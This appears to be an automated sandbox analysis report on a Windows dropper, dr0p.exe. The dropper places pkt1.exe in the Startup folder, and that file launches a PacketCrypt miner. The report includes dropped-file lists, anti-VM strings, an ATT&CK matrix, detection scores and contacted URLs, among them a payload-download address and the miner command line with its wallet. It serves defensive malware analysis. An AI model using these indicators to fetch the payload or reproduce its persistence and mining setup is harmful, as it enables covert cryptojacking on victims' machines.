Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.WebClient.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.IsolatedStorage.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Private.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Globalization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.AppContext.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.NameResolution.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.EventBasedAsync.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\WindowsBase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Claims.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.WebSockets.Client.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.FileSystem.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.Win32.Registry.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Serialization.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.Watcher.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.Encoding.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Private.Xml.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.HttpListener.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ValueTuple.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.XDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.Algorithms.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Emit.ILGeneration.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Formats.Asn1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ServiceModel.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Transactions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.FileVersionInfo.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Intrinsics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Concurrent.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Drawing.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.CompilerServices.Unsafe.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Http.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Resources.ResourceManager.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Emit.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Private.Uri.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Sockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Security.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.RegularExpressions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Globalization.Calendars.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Globalization.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Specialized.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Principal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Contracts.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Overlapped.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.ServicePoint.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Serialization.Formatters.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Data.DataSetExtensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.Encoding.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.Parallel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.XmlDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.Encoding.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.WebProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Requests.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Console.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

API coverage: 0.0 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: dr0p.exe, 00000000.00000002.2024733602.0000000005883000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: dr0p.exe, 00000000.00000002.2024733602.00000000058A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: dr0p.exe, 00000000.00000002.2024733602.0000000005883000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dr0p.exe, 00000000.00000002.2024733602.0000000005855000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: dr0p.exe, 00000000.00000002.2024733602.0000000005883000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: packetcrypt.exe, 00000006.00000002.4110027580.00000239E1289000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Process created: C:\Users\user\AppData\Local\Temp\packetcrypt.exe "C:\Users\user\AppData\Local\Temp\packetcrypt.exe" ann -p pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a http://pool.pkt.world			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Code function: 4_2_00007FF68EC403BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00007FF68EC403BC

Remote Access Functionality

Found API chain with Download & Execute functionality

Source: C:\Users\user\Desktop\dr0p.exe

Download & Execute: InternetReadFile,WriteFile,ShellExecute

graph_0-43

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	12 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	Data from Local System	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	12 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	23 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
dr0p.exe	42%	ReversingLabs	Win32.Trojan.Crysant
dr0p.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\PacketCryptApp.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.CSharp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.Win32.Primitives.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.Win32.Registry.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\PacketCryptApp.dll	18%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.AppContext.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Buffers.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Concurrent.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Immutable.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.NonGeneric.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Specialized.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.Annotations.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.DataAnnotations.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.EventBasedAsync.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.Primitives.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.TypeConverter.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Configuration.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Console.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Data.Common.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Data.DataSetExtensions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Data.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Contracts.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Debug.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.DiagnosticSource.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.FileVersionInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Process.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.StackTrace.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.TextWriterTraceListener.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Tools.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.TraceSource.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Tracing.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Drawing.Primitives.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Drawing.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Dynamic.Runtime.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Formats.Asn1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Formats.Tar.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Globalization.Calendars.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Globalization.Extensions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Globalization.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.Brotli.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.FileSystem.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.ZipFile.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.AccessControl.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.DriveInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.Primitives.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.Watcher.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.IsolatedStorage.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.MemoryMappedFiles.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Pipes.AccessControl.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Pipes.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.UnmanagedMemoryStream.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.Expressions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.Parallel.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.Queryable.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Memory.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7#	0%	Avira URL Cloud	safe
http://pool.pkt.worldin	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submitL	0%	Avira URL Cloud	safe
http://23.27.51.244/pkt1.exe	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submitK	0%	Avira URL Cloud	safe
http://pool.pkt.world/master)	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submit	0%	Avira URL Cloud	safe
http://master.pkt.world/payg.json	0%	Avira URL Cloud	safe
http://pool.pkt.world/masterTz	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.jsonK	0%	Avira URL Cloud	safe
http://master.pkt.world/pay6	0%	Avira URL Cloud	safe
http://master.pkt.world/payMT	0%	Avira URL Cloud	safe
http://pool.pkt.world/master2	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submit(	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submit;	0%	Avira URL Cloud	safe
http://pool.pkt.world/master&	0%	Avira URL Cloud	safe
http://master.pkt.wo	0%	Avira URL Cloud	safe
http://master.pkt.world/payA	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.json	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submit1	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.jsonw	0%	Avira URL Cloud	safe
http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c425	0%	Avira URL Cloud	safe
http://pool.pkt.world/config.jsony	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submit&	0%	Avira URL Cloud	safe
http://pool.pkt.world/master.json	0%	Avira URL Cloud	safe
http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7	0%	Avira URL Cloud	safe
http://pool.pkt.world/master.jsonX	0%	Avira URL Cloud	safe
http://any.ah.pkt.wor	0%	Avira URL Cloud	safe
http://pool.pkt.worldC:HOMEPATH=	0%	Avira URL Cloud	safe
http://master.pkt.world/payg.json7	0%	Avira URL Cloud	safe
http://pool.pkt.world/master	0%	Avira URL Cloud	safe
http://pool.pkt.world/master/blkinfo_1b2f0c4a3739221fbf80e36dad285b3f61b60e1ff8ab442582de1d9af7630b8	0%	Avira URL Cloud	safe
http://pool.pkt.world	0%	Avira URL Cloud	safe
http://pool.pkt.world/masterT	0%	Avira URL Cloud	safe
http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e99409592	0%	Avira URL Cloud	safe
http://pool.pkt.world/master.jsonv	0%	Avira URL Cloud	safe
http://master.pkt.world/pay=2c	0%	Avira URL Cloud	safe
http://pool.pkt.world/masterdate=2fVS	0%	Avira URL Cloud	safe
http://pool.pkt.world/	0%	Avira URL Cloud	safe
http://pool.pkt.world/blk/submitm32	0%	Avira URL Cloud	safe
http://pool.pkt.world/masterdate=2	0%	Avira URL Cloud	safe
http://pool.pkt.world/mastern	0%	Avira URL Cloud	safe
http://pool.pkt.world/mastern1	0%	Avira URL Cloud	safe
http://pool.pkt.world/master9	0%	Avira URL Cloud	safe
